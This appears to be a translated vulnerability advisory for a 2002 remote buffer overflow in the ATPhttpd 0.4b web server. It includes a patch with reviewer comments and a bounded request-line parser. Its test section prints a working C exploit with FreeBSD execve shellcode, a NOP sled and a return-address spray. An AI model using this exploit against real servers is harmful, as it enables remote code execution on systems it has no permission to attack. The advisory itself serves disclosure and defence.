ATPhttpd Remote Buffer Overflow Vulnerability
Release date: 2002-07-12
Last updated: 2002-07-18
Affected systems:
Yann Ramin ATPhttpd 0.4b
Description:
BUGTRAQ ID: 5215
ATPhttpd is a small, high-performance web server developed and maintained by Yann Ramin.
ATPhttpd lacks proper bounds checking on user-submitted requests; a remote attacker can exploit these flaws to mount buffer overflow attacks.
The ATPhttpd source code contains multiple remotely exploitable vulnerabilities, including conventional buffer overflows and an off-by-one buffer overflow. An attacker can exploit them to execute arbitrary instructions on the system with the privileges of the ATPhttpd process.
<*Source: qitest1 (qitest1@bespin.org)
Link: http://archives.neohapsis.com/archives/bugtraq/2002-07/0134.html
*>
Test method:
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching purposes. Users bear the risk themselves!
#include <stdio.h>

/* atphttpd exploit.
/ The exploit sucks, if you get it wrong the first time the server just dies
/ so I didnt bother adding any offset argument to the exploit. Also if you
/ change the IP addy you may have to change the alignment a little.
/
/ http://www.badc0ded.com
*/
#define ret "\x78\xf5\xbf\xbf"
char FreeBSD[]= /* stolen lsd-pl.net shellcode */
"\xeb\x25" /* jmp <cmdshellcode+39> */
"\x59" /* popl %ecx */
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x66\x68""-c" /* pushw $0x632d */
"\x89\xe7" /* movl %esp,%edi */
"\x50" /* pushl %eax */
"\x51" /* pushl %ecx */
"\x57" /* pushl %edi */
"\x53" /* pushl %ebx */
"\x89\xe7" /* movl %esp,%edi */
"\x50" /* pushl %eax */
"\x57" /* pushl %edi */
"\x53" /* pushl %ebx */
"\x50" /* pushl %eax */
"\xb0\x3b" /* movb $0x3b,%al (FreeBSD execve) */
"\xcd\x80" /* int $0x80 */
"\xe8\xd6\xff\xff\xff" /* call <cmdshellcode+2> */
"/usr/X11R6/bin/xterm -display 127.0.0.1:0;";
int main(void)
{
int i;
for (i=0;i<=501;i++) // this would be a good place to change alignment
printf("\x90");
printf("%s",FreeBSD);
for (i=0;i<=100;i++)
printf("%s",ret);
printf("\n\n");
return 0;
}
Recommendations:
Workaround:
If you cannot install a patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:
* No suitable workaround is available at this time.
Vendor patch:
Yann Ramin
----------
qitest1 (qitest1_at_bespin.org) provides the following third-party patch:
==8< atphttpd-0.4b.patch 8<==
diff -u atphttpd-0.4b-old/atphttpd/http_handler.c atphttpd-0.4b/atphttpd/http_handler.c
- --- atphttpd-0.4b-old/atphttpd/http_handler.c Sat Apr 22 05:05:57 2000
+++ atphttpd-0.4b/atphttpd/http_handler.c Fri Jul 12 13:20:16 2002
@@ -235,7 +235,7 @@
(void) sprintf(buffer, "<HTML><HEAD><TITLE>%d %s</TITLE></HEAD>\n<BODY><H2>%d %s</H2>\n", status, title, status, title );
sock_puts(hc[listnum].socket, buffer);
- - (void) sprintf(buffer, "The following error occurred while trying to examine the garbage that you sent this poor webserver: <br><b>%s</b><br><br>\n", text );
+ snprintf(buffer, sizeof(buffer), "The following error occurred while trying to examine the garbage that you sent this poor webserver: <br><b>%s</b><br><br>\n", text);
sock_puts(hc[listnum].socket, buffer);
(void) sprintf(buffer, "<HR>\n<ADDRESS>This cool page was automaticly generated by the trained rodents living inside the <A HREF=\"%s\">%s</A> webserver.</ADDRESS>\n</BODY></HTML>\n", SERVER_URL, SERVER_NAME );
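Review bot: only the second sprintf into buffer is bounded here; the first and third sprintf calls on the surrounding context lines still write to the same buffer without a length. Even if status, title, SERVER_URL and SERVER_NAME are server-controlled, converting them to snprintf(buffer, sizeof(buffer), ...) as well keeps the function consistently bounded. Note also that sizeof(buffer) is the array size only if buffer is declared as a local array in this function, which the hunk does not show; if it is a pointer, sizeof yields the pointer size. Checking the snprintf return value would let a truncated error page be detected instead of silently sent.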
diff -u atphttpd-0.4b-old/atphttpd/main.c atphttpd-0.4b/atphttpd/main.c
- --- atphttpd-0.4b-old/atphttpd/main.c Sat Apr 22 05:06:00 2000
+++ atphttpd-0.4b/atphttpd/main.c Fri Jul 12 13:30:55 2002
@@ -141,13 +141,11 @@
}
}
- - void deal_with_data(int listnum) {
- - char buffer[MAX_BUFFER]; /* Buffer for socket reads */
- -// char *cur_char; /* Used in processing buffer */
- - char method[MAX_STORE], path[MAX_STORE], protocol[MAX_STORE];
- -
- - if (sock_gets(hc[listnum].socket,buffer,MAX_BUFFER) < 0) {
+void deal_with_data(int listnum) {
+ char buffer[MAX_BUFFER];
+ char method[MAX_STORE], path[MAX_STORE], protocol[MAX_STORE];
+ if (sock_gets(hc[listnum].socket, buffer, MAX_BUFFER - 1) < 0) {
close(hc[listnum].socket);
hc[listnum].socket = 0;
} else {
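Review bot: passing MAX_BUFFER - 1 to sock_gets closes the off-by-one only if sock_gets treats its length argument as the number of bytes it may write before the terminating NUL; that contract is not visible in the hunk and should either be documented at the call site or, better, fixed inside sock_gets so callers can simply pass sizeof(buffer). Dropping the commented-out cur_char line is fine, but the `/* Buffer for socket reads */` comment on the declaration was lost in the rewrite and is worth keeping.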
@@ -155,7 +153,7 @@
* *
* Right now it is very dumb, and only checks for a get header *
* Improvements? */
- - sscanf( buffer, "%[^ ] %[^ ] %[^ ]", method, path, protocol );
+ sscanf(buffer, "%1023s %1023s %1023s", method, path, protocol);
if ( strcasecmp( method, "get" ) == 0 || strcasecmp( method, "head" ) == 0) {
strcpy(hc[listnum].path, path);
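Review bot: the %1023s widths hardcode a value that must stay equal to MAX_STORE - 1 for method, path and protocol; if MAX_STORE changes, the widths silently become wrong, so derive them from the same constant (a stringized MAX_STORE-1 macro) or parse with an explicit length check. The sscanf return value is still unchecked: a request line with fewer than three fields leaves method uninitialized before the strcasecmp on the next line, so the request should be rejected when sscanf(...) != 3. The strcpy(hc[listnum].path, path) on the last context line also remains unbounded and is safe only if hc[listnum].path holds at least MAX_STORE bytes, which the hunk does not show.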
==8< atphttpd-0.4b.patch 8<==
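A bounded request-line parser in the spirit of the patch's sscanf fix, added here as an example for this advisory (it is not atphttpd's code nor the patch author's); MAX_STORE is assumed to be 1024, and the parser rejects, rather than truncates, any field that would not fit its destination.

```c
#include <stddef.h>
#include <string.h>

/* Added example, not atphttpd's code: MAX_STORE mirrors the array size
 * used in the patch; the value 1024 is an assumption. */
#define MAX_STORE 1024

/* Copy one blank-delimited token from *cursor into dst[dst_size].
 * Returns 0 and advances *cursor on success, -1 if the token is empty
 * or would not fit together with its terminating NUL. */
static int take_token(const char **cursor, char *dst, size_t dst_size)
{
    const char *p = *cursor + strspn(*cursor, " \t");   /* skip blanks */
    size_t len = strcspn(p, " \t\r\n");                /* token length */

    if (len == 0 || len >= dst_size)   /* empty or over-long field */
        return -1;
    memcpy(dst, p, len);
    dst[len] = '\0';
    *cursor = p + len;
    return 0;
}

/* Parse "METHOD SP PATH SP PROTOCOL" with an explicit bound on every
 * destination, instead of sscanf("%[^ ]") into fixed arrays.
 * Returns 0 on success, -1 on malformed or over-long input; on failure
 * all three outputs are reset to empty, NUL-terminated strings. */
int parse_request_line(const char *line, char method[MAX_STORE],
                       char path[MAX_STORE], char protocol[MAX_STORE])
{
    const char *cursor = line;

    if (take_token(&cursor, method, MAX_STORE) == 0 &&
        take_token(&cursor, path, MAX_STORE) == 0 &&
        take_token(&cursor, protocol, MAX_STORE) == 0) {
        /* Only blanks and CRLF may follow the third field. */
        cursor += strspn(cursor, " \t\r\n");
        if (*cursor == '\0')
            return 0;
    }
    method[0] = path[0] = protocol[0] = '\0';
    return -1;
}
```

A caller that gets -1 should send the error response and close the connection; nothing from the rejected line is ever copied into hc[listnum].path.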